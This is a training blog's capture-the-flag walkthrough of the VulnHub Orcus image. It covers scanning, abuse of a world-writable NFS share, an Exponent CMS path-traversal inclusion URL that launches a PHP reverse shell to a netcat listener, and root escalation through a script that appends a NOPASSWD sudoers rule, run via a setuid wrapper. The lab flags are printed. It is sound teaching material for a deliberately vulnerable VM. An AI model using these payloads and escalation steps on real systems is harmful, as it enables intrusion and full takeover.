VulnHub Orcus Walk Through - CEH Training

As part  of our cyber security training courses, such as Certified Ethical Hacker, usually on the last day, once the official material has been covered and to provide some practical experience to students we pick an image from VulnHub and see how far the class can go, as a group, to capture the flags.

Orcus Walk Through - CEH Training March 2017

This blog post is a walk through on the Orcus image from 15 March 2017. We found 4 flags but are not sure if two of the flags are in fact 1 flag that has been duplicated. It will be interesting to see what tack other take to crack this and what flags they find.

Scanning Phase - nmap

With the vm image up and running we start at the scanning stage with trusty nmap. We use insane timing (-T5) in class to lessen the scan time but would adopt a more cautious approach in a real world pen testing scenario. We would also use a scanning technique that would be less likely to raise alarms if the target is running an IDS/IPS and of course use proxies.

sudo nmap -T5 -sT -p1-65535 -O -A <ip address>

We get the following scan results:

Nmap scan report for 192.168.122.32
Host is up (0.00023s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp    open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING TOP STLS SASL AUTH-RESP-CODE UIDL CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      47691/udp  mountd
|   100005  1,2,3      57193/tcp  mountd
|   100021  1,3,4      33400/udp  nlockmgr
|   100021  1,3,4      41522/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: IDLE post-login Pre-login SASL-IR LOGINDISABLEDA0001 listed ENABLE IMAP4rev1 STARTTLS LITERAL+ OK have ID capabilities LOGIN-REFERRALS more
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING TOP AUTH-RESP-CODE SASL(PLAIN) USER UIDL CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs         2-4 (RPC #100003)
41522/tcp open  nlockmgr    1-4 (RPC #100021)
52285/tcp open  mountd      1-3 (RPC #100005)
57193/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      47691/udp  mountd
|   100005  1,2,3      57193/tcp  mountd
|   100021  1,3,4      33400/udp  nlockmgr
|   100021  1,3,4      41522/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
59568/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 52:54:00:C5:3B:66 (QEMU virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: orcus
|   NetBIOS computer name: ORCUS
|   Domain name: 
|   FQDN: orcus
|_  System time: 2017-03-21T12:27:15-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms xx.xx.xx.xx

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.77 seconds

There is a lot of attack surface here, which is one of the challenges of this particular image. One interesting point to note is that SSH is listening on port 22 and port 443, traditionally the https port. We are not sure what this means at this stage so simply note it and move on.

With so much to go through we take a quick squiz at what available starting with the http port 80. We don't bother with 443 yet as it is running SSH.

Gather Information on Port 80 Applications

Browsing to port 80 show us the default Orcus welcome page. We follow the links available and note nothing interesting other than the fact that the pages are just images. If we get stuck we could come back later and see if there is any information hidden in the images. We also take a quick look at the web page source to see if there is anything but it looks like this is a dead-end. We quickly examine the robots.txt file to see if there is anything interesting and there is. We note this down for further investigation and move on.

Robots.txt

user-agent: *
Crawl-delay: 5
# @@@@@@   @@@@@@@    @@@@@@@  @@@  @@@   @@@@@@   
#@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  @@@  @@@@@@@   
#@@!  @@@  @@!  @@@  [email protected]@       @@!  @@@  [email protected]@       
#[email protected]!  @[email protected]  [email protected]!  @[email protected]  [email protected]!       [email protected]!  @[email protected]  [email protected]!       
#@[email protected]  [email protected]!  @[email protected][email protected]!   [email protected]!       @[email protected]  [email protected]!  [email protected]@!!    
#[email protected]!  !!!  [email protected][email protected]!    !!!       [email protected]!  !!!   [email protected]!!!   
#!!:  !!!  !!: :!!   :!!       !!:  !!!       !:!  
#:!:  !:!  :!:  !:!  :!:       :!:  !:!      !:!   
#::::: ::  ::   :::   ::: :::  ::::: ::  :::: ::   
# : :  :    :   : :   :: :: :   : :  :   :: : :    
Disallow: /exponent.js.php
Disallow: /exponent.js2.php
Disallow: /exponent.php
Disallow: /exponent_bootstrap.php
Disallow: /exponent_constants.php
Disallow: /exponent_php_setup.php
Disallow: /exponent_version.php
Disallow: /getswversion.php
Disallow: /login.php
Disallow: /overrides.php
Disallow: /popup.php
Disallow: /selector.php
Disallow: /site_rss.php
Disallow: /source_selector.php
Disallow: /thumb.php
Disallow: /ABOUT.md
Disallow: /CHANGELOG.md
Disallow: /CREDITS.md
Disallow: /INSTALLATION.md
Disallow: /LICENSE
Disallow: /README.md
Disallow: /RELEASE.md
Disallow: /TODO.md
Disallow: /cgi-bin/
Disallow: /cart/
Disallow: /login/
Disallow: /users/
Disallow: /files/
Disallow: /tmp/
Disallow: /search/

# Sitemap: http://www.mysite.com/sitemap.xml

Poking around Port 22/443

We ssh to the ports 22 & 443 and try root/root root/password root/admin. You never know :) But as suspected no luck. We next tackle the smtp/imap(s) and pop3(s) ports we telnet to them to see if there is anything unusual but it looks like a dead-end. We note it down and will come back here is all else is lost.

We also issue a dig command against the DNS server to see if anything interesting happens but we get a normal DNS response.

dig @xx.xx.xx.xx google.com ANY

Network Shares - Samba/NFS

Next we move on to the interesting, higher, ports 47691 and 57193. We note these are NFS ports and this could be interesting. But first we look at the samba ports as in capture the flag contests this usually is the more popular service to stash clues and host potential vulnerabilities. Running

smbclient -L <IP Address>

reveals nothing interesting.

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Orcus server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Server               Comment
	---------            -------
	ORCUS                Orcus server (Samba, Ubuntu)

NFS - Our First Big Break

Mmmmm lets continue to search for low hanging fruit although the web application is looking more and more like the likely point of attack. But first lets look at the NFS service. What shares are available for NFS and is it protected? We run

showmount -e xx.xx.xx.xx
Export list for xx.xx.xx.xx:
/tmp *

Bingo! We get an available share! Lets see if we can mount it.

sudo mount -t nfs <ip address>:/tmp /mnt

It works! Lets see what we have. Running

ls -l /mnt
drwx------ 3 root     root        4096 Mar 21 09:26 systemd-private-2de4032a6b514198bc55edb78217e912-dovecot.service-HyFAmJ
drwx------ 3 root     root        4096 Mar 21 09:26 systemd-private-2de4032a6b514198bc55edb78217e912-systemd-timesyncd.service-5td805

Mmmm can we can't read these files but can we write a new file?

touch /mnt/test

Running "ls -l /mnt" again shows that the file is created and owned by user 1000, the UID of our currently logged in user. What if we try and make the file owned by root?

chown root:root /mnt/test

It works! Lets chalk up the first major find! So we can create files owned by root set them executable, even setuid, and basically upload anything we want to the share. But how are we to get the file to execute?

Back to the Web Application

After trying to think of innovative ways to do this we decide to look again at the web application. From our initial mapping exercise we note the reference in robots.txt to files with the name exponent. We also browse to some of the robots.txt directories like /files and note that they are browseable and display directory listings. A good sign, for us. We run nikto against it for good measure.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          xx.xx.xx.xx
+ Target Hostname:    xx.xx.xx.xx
+ Target Port:        80
+ Start Time:         2017-03-21 18:58:59 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.23). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9552 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-21 18:59:12 (GMT2) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There is so much here we spend a bit of time exploring but start feeling that we are being lead astray here as some of the urls like test.php do nothing observable or appear to be red herrings. It does look like a half installed or misconfigured application which may offer some none obvious vulnerabilitites.

The directory traversal vulnerabilities listed by nikto also appear to be false positives. Lets switch tracks and see what application these files could belong to? We note the repeated use of "exponent" in the file names found by nikto and listed by robots.txt. A quick Google reveals a likely candidate "Exponent CMS". This is looking more promising now.

Exponent CMS - Our Next Big Break

Next we google for Exponent CMS vulnerabilities which provides a wealth of possibilities. The first one we pick looks promising. It's a unrestricted file upload and Local File include vulnerability which means we can carry out a remote code execution attack. Sounds promising! For completeness we query our local exploit-db instance with "./searchsploit exponent" which shows the following:

-------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
 Exploit Title                                                                                                                  |  Path
                                                                                                                                | (/opt/exploit-database/platforms/)
-------------------------------------------------------------------------------------------------------------------------------- -----------------------------------
Exponent CMS 0.96.3 - (view) Remote Command Execution                                                                           | php/webapps/2391.php
Exponent CMS 0.96.3 - (articlemodule) SQL Injection                                                                             | php/webapps/11349.txt
Exponent CMS 0.97 - Multiple Vulnerabilities                                                                                    | php/webapps/15247.txt
Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)                                        | php/webapps/17235.html
exponentcms 2.0.5 - Multiple Vulnerabilities                                                                                    | php/webapps/18773.txt
Exponent CMS 2.3.9 - Blind SQL Injection                                                                                        | php/webapps/40412.txt
Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities                                                               | php/webapps/25058.txt
Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities                                                                            | php/webapps/25518.txt
Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting                                                | php/webapps/29870.txt
Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting                                         | php/webapps/29871.txt
Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing                               | php/webapps/29872.txt
Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting                                                                     | php/webapps/34265.txt
Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload                                                      | php/webapps/35717.txt
Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities                                                              | php/webapps/36059.txt
Exponent CMS 2.0 - 'src' Parameter SQL Injection                                                                                | php/webapps/36916.txt
-------------------------------------------------------------------------------------------------------------------------------- -----------------------------------

Time to roll up the sleeves! The exponent cms exploit has two parts.

  1. A way to upload an arbitrary file and then
  2. An inclusion vulnerability to invoke the file.

We try the upload part first. Copying out the html code, contain in the link to create an upload.html page is trivial.  All we need to do is change the host name in the post tags action attribute to your targets ip address.

The security bulletin mentions some brute forcing will be necessary to "guess" the correct name of the uploaded file. We notice that the exponent code uploads to the  /tmp directory.

This the same directory as we can access under /mnt from the NFS misconfiguration found above! Uploading a file via the unrestricted file upload vulnerability doesn't result in a file in the /tmp directory as expected when we run "ls /mnt". But we have missed the wood from the trees in our discovery. We can simply copy a file over to /mnt and then try and execute it via the file inclusion vulnerability.

Get Shell Access - Upload php-reverse-shell to Our NFS Mount

So we copy of a simple test.php file that prints out some text to /mnt and try the url (from the security bulletin above)

http://ip-address/install/popup.php?page=../../../../../tmp/test

We have to stuff around with the number of directory transversals a little but finally it works! So our next step is to copy over our reverse shell code from pentestmonkey. Edit the file to connect to our ip address. Thee is some danger here while your host is listening for incoming connections and this would normally be done through a proxy in a pen test to avoid being traced back to the source.

Our First Flag

On our machine we run

nc -l local-ip-address 1234

Then visit the url

http://ip-address/install/popup.php?page=../../../../../tmp/php-reverse-shell.php

and we are in. Time to start poking around. We quickly pick up the first flag under /var/www/flag.txt (868c889965b7ada547fae81f922e45c4).

SSH Honey Pot - Kippo

Now to see about escalating privileges from www-data to root. We spent a bit of time here gathering info and trying to figure out what to do.Once we did we were a bit ashamed we didn't think of it earlier. We took the scenic route.

There is a lot of files in the /var/www directory and we spend some time attempting to find config files that might contain database user names and passwords. Since we think there might be a flag related to mysql and phpmyadmin, but to no avail. It appears the zenphoto-zenphoto-1.4.10 directory in /var/www is a red herring.

We "cat /etc/passwd" to see if there are any account that we might need to brute force and discover a user called kippo. "id kippo" shows this user is part of the sudo group. We wasted a bit of time trying to figure out if there was a possibility of compromising this account as a way to sudo to root but this was a waste of time ultimately. Maybe there is a way to use this account to gain root access but we found another way.

Our 2nd & 3rd Flag

After running "find / -user kippo" we discover a bunch of files under /etc/kippo. Some googleing reveals this is a ssh honeypot application. Since the files are world readable we poke around trying to see if there are any passwords or such in the config files. Here we find two more flags. These are the ones we are not sure are duplicates or not. There is one in /etc/kippo/kippo.cfg.

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!

There is another in the file /etc/kippo/data/userdb.txt

fakuser:1:TH!SP4SSW0RDIS4Fl4G!

Initially we though that the ssh server on port 22 is a honey pot as the config file is set to listen on port 22 but after some time scratching around it appears that the honey pot is not running. A "ps -uax" shows no such process.

MySQL Investigation

We turn our attention to MySQL and Postgres which are running on localhost only. We notice that MySQL has a custom install on /mysql-5.7.14. But the instance that is running appears to be the default Ubuntu package. We check out exploit-db and there are numerous exploits for the MySQL version. The most applicable ones require an existing username and password to execute. We note this and continue our search. We tried other MySQL exploits that do not require a valid MySQL user but they fail to execute. It appears later that apparmor is providing some protection.

Postgres has a limited attack surface and appears to be another diversion so we move on.

Since we can't seem to find anything under kippo and MySQL we move on and examine the /var/www directory again. We notice that the /var/www/html directory is not readable. Since we are the owner we simple "chmod +r /var/www/html" and there is a host of interesting stuff, most of it appears to be distractions but the backups directory looks promising.

$ ls -l /var/www/html/backups
total 216
-rw-r--r-- 1 www-data www-data 215368 Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz
-rw-r--r-- 1 www-data www-data     12 Nov  1 21:33 ssh-creds.bak

We immediately cat the "ssh-creds.bak" file but the root password it contains is bogus. Next we download the SimplePHPQuiz-Backup.tar.gz file with http://ip-address/backups/SimplePHPQuiz-Backupz.tar.gz. It contains the backup of a web application we start to look for the config file and we find it! The file is under SimplePHPQuiz/includes/db_conn.php.


With a sense of excitement we jump over to phpmyadmin and login. We waste time here examining databases and attempting to see if there is another flag or a privilege escalation vulnerability. There are a few listed in exploit-db that seem good. Since we now have a username and password we try some out but they do not work.

Privilege Escalation

Getting a little frustrated, we clear our minds, drink some coffee and visualise root. Then is comes to us. We can upload any file with any permissions we want to /mnt. We can just upload a setuid application and execute it from popup.php. We have a Homer Simpson moment.

We create a bash script "exploit.sh" and change its ownership to root:root under /mnt.

#!/bin/sh
echo "trying..."
echo "%www-data ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "done"

But we can't setuid on shell scripts so we use a setuid wrapper. We edit the file to reference our script. Then we upload the script and source file to /mnt. On the reverse shell we run in /tmp

gcc wrapper.c -o wrapper

We then

chmod u+s,a+x wrapper

and invoke our script with ./wrapper.

Final Flag /root/flag.txt

Now we try "sudo ls /root" and it works. So we run "sudo passwd" and set up a password. Now we can ssh in as root. There is a file under root called /root/flag.txt (807307b49314f822985d0410de7d8bfe). This we hope is the finally flag. We attempt to see if there is another but can't find any.

Comments

Do you mind if I quote a few of your articles as long as I provide
credit and sources back to your blog? My blog is in the exact same niche as yours and my visitors would definitely benefit from a lot of the information you provide here.
Please let me know if this okay with you. Regards!